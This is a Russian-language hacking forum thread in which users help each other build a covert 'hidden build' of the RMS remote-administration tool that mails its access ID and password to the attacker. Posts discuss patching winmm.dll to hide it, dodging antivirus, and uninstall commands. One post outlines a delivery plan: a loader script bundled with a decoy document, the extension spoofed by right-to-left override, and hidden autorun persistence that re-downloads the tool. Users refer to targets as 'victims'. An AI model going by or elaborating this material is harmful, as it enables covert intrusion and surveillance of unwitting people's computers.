RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. maks33198
    maks33198 Новичок
    Симпатии:
    0
    .тоже хотел бы знать

27 фев 2014
  2. Иван Durak
    Иван Durak Новичок
    Симпатии:
    0
    Всем привет, подскажите пожайлуйста с какой страницы читать топик, где описано создание "скрытой сборки". Я прочитал все с 1й по 170 страницу, но нихера не понял какая информация актаульна, а какая нет.
    Заранее благодарен.

27 фев 2014
  3. Rmist
    Rmist Новичок
    Симпатии:
    1
    ссылка на пост 1410 бёрнса там актуально для 5.5 и следом ещё посты почитать. Но АВ уже видит без проблем рмс. За исключением древних версий, но надеятся не стоит.

27 фев 2014
  4. promptup
    promptup Новичок
    Симпатии:
    0
    А крипт не поможет??

Добавлено через 43 минуты
    Кто шарит в командах бат файла и сделал под себя сборку РМС 5,6,0,6 дайте свой скайп (мой - wanya.ua), а то моей богатой фантазии и логики не соответствуют знания(
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**

Последнее редактирование: 28 фев 2014
    28 фев 2014
  5. Иван Durak
    Иван Durak Новичок
    Симпатии:
    0
    Спасибо большое, будем баловаться)

28 фев 2014
  6. GeForse
    GeForse Новичок
    Симпатии:
    4
    28 фев 2014
  7. nightop
    nightop Новичок
    Симпатии:
    6
    всем привет, было от какого-то сообщение про неоффициальный сервер (авторизация без ключей) . Не найду кто писал.. Кто знает где такой найти?

18 апр 2014
  8. maks33198
    maks33198 Новичок
    Симпатии:
    0
    удалили эти сообщения и другие тоже!

18 апр 2014
  9. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    18 апр 2014
  10. A-L-I-E-N
    A-L-I-E-N Новичок
    Симпатии:
    5
    Приветствую уважаемые! Подскажите кто сталкивался с проблемой когда установка RMS server вообще не запускается.

Всё делал по инструкциям. Сценарий из bat файла выполняется, папочку создает, winmm.dll копирует. Но вот саму установку RMS не запускает.
    При самой первой пробе установка запустилась. После этого, все последующие попытки - ничего не хочет устанавливать.

Изначально тестировал на версии 5.6, но сейчас мучаю 5.5 чтобы уж наверняка. Перед запуском установки почистил от старых версий этим сценарием #1519
    winmm.dll пользую из этого поста #1667
    Вот такой использую install.cmd
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**
    Не запускается даже обычный оригинальный, не модифицированный OneClick дистрибутив RMS.

Долго сидел на комете, а сейчас вот хочу подкрепить свои инструменты РМСкой =) Быть может модифицирую где. Буду очень признателен :)

19 апр 2014
  11. nightop
    nightop Новичок
    Симпатии:
    6
    а запускается установщик любой дугой безопасной программы в системе вообще?

попробуй еще прогнать прогой
    Hidden Content:

19 апр 2014
  12. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Скорее всего дело в этих строчках:
    @MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
    @MsiExec /x {C2AD926E-45DC-4C5F-88A0-63AEE6A3262A} /qn REBOOT=ReallySuppress
    Попробуй поменять на эти (Всё зависит от версии хоста эти строчки для 5.5.3)
    @MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /passive REBOOT=ReallySuppress
    @MsiExec /x {54067864-C0E7-47DB-A0C1-D6C874CE6BD8} /passive REBOOT=ReallySuppress
    И обычной заменой в батнике эти строчки лучше не менять self install применяй + реестр почисть

19 апр 2014
  13. A-L-I-E-N
    A-L-I-E-N Новичок
    Симпатии:
    5
    Большое спасибо за ответы. Но ничего не помогло.
    Сначала запустил этот "ремовер", нашло только в сервис "RManService TektonIT - R-Server". Я его удалил. Хоть при чистке "ремовер" сказал, что данная служба не установлена. И по прежнему находит этот сервис при каждом сканировании.
    Далее, запустил RegOrganizer и почистил реестр. Так же чистил и CCleaner'ом. Вручную удалил все ключи "tektonit" и "remote manipulator".
    Поудалял любые директории из Program Files, Program Data, Temp, AppData и т.д. Удалил RMS Viewer.

Перезагрузил компьютер. Специально собрал OneClick дистрибутив, и ничего не меняя в нем, запустил оригинальный RMS.exe. Открылся сайт разработчика, два раза моргнуло окно установки на доли секунд и... ничего. Установка не запустилась.

Другие msi запускаются без проблем. Что же это может быть, уже все мозги замучал %) Никак не додумаюсь. Антивирус отключен, фаервола нет, брандмауэр отключен.

19 апр 2014
  14. nightop
    nightop Новичок
    Симпатии:
    6
    аа версия 5.6 также не ставится?

19 апр 2014
  15. A-L-I-E-N
    A-L-I-E-N Новичок
    Симпатии:
    5
    Да, версия 5.6 установилась без проблем теперь. Странно...
    Спасибо большое мужики! Очень круто что сделали перехват API. Просто невероятно вам благодарен!

Хочу поинтересоваться, а какая разница делать лоадер с помощью Wget или, к примеру vbs скриптик такой сделать:
    Hidden Content:
    А скриптик уже помещаем в архив вместе с любым документом, для маскировки. Меняем иконку, и с помощью left-to-right override маскируем расширение. Там уж можно и на автозагрузку назначить проверку rfusclient и если не найдет, то исполнение сборки RMS.exe из каких нибудь недр системы =)

Выглядеть всё должно так: Жертва запускает SomeNamexe.doc и реально открывается документик. В это время все потроха RMS.exe и бат файлик скачиваются в глубь системы. Добавляется автозагрузка бата. При каждом запуске системы, он будет проверять есть ли рабочий rfusclient на компьютере, и если нет, то скачивать заново, устанавливать, маскировать. Автозагрузку сделать скрытую.
    Как-то на подобие такого, я еще не придумал:
    Hidden Content:

Последнее редактирование: 19 апр 2014
    19 апр 2014
  16. nightop
    nightop Новичок
    Симпатии:
    6
    так макрос не сработает в ворде при среднем или высоком уровне? нцжен низуий уровень безопасности ведь...

19 апр 2014
  17. A-L-I-E-N
    A-L-I-E-N Новичок
    Симпатии:
    5
    Не, ворд здесь и не нужен. Это я про spoof extension. Просто маскировка расширения. Расширение файла пишется с права на лево. Но это уже у кого как фантазии хватит. Чисто мысли вслух =)
    Мне больше интересно запускал ли кто нибудь RMS через mini internet ID? Возможно ли такое осуществить не заказывая "белый" IP у провайдера? А обойтись лишь каким нибудь сочетанием, к примеру, VPN + no-ip?

19 апр 2014
  18. GeForse
    GeForse Новичок
    Симпатии:
    4
    +к теме про сокрытие, статья на хакере была про спуфинг расширений в винраре, изменения идут именно в WinRAR GUI, пруф:
    Hidden Content:
    а если еще приплюсовать вышеупомянутый left-to-right override то можно уже не плохо замаскироваться;)
    Но все таки прошу еще раз отписаться того кто писал про выделенный сервер, личные сообщения тож откатило :(
    И кстати пока не забыл, dll палится вновь Авирой, а Аваст орет как ни в себе на последнюю сейчас 5.6...

20 апр 2014
  19. Blokada
    Blokada Новичок
    Симпатии:
    0
    У жертвы Windows 8 два рабочих стола\монитора все функции работают кроме просмотра и управления. Никогда с Windows 8 не сталкивался. Кто знает решение буду признателен.

20 апр 2014
  20. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Не очень понятно, что конкретно нужно? " 2 моника и ?

Последнее редактирование: 20 апр 2014
    20 апр 2014
Статус темы:
Закрыта.
Загрузка...